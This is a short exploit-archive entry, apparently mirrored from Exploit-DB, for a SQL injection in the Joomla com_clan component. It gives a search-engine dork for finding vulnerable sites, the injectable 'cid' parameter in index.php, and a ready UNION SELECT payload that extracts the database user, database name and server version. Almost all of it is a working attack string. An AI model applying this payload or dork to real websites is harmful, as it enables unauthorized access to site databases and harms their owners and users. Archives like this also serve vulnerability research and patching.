exploit-db-mirror/exploits/php/webapps/15454.txt
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

19 lines
No EOL
655 B
Text

Joomla Component com_clan Sql Injection Vulnerability
==============================================================
http://joomlacode.org/gf/project/com_clan/
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : inurl:"com_clan"
####################################################################
===[ Bug ]===
www.site.com/index.php?action=com_clan&cid=185[Sql Injection]
===[ Exploit ]===
185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8
####################################################################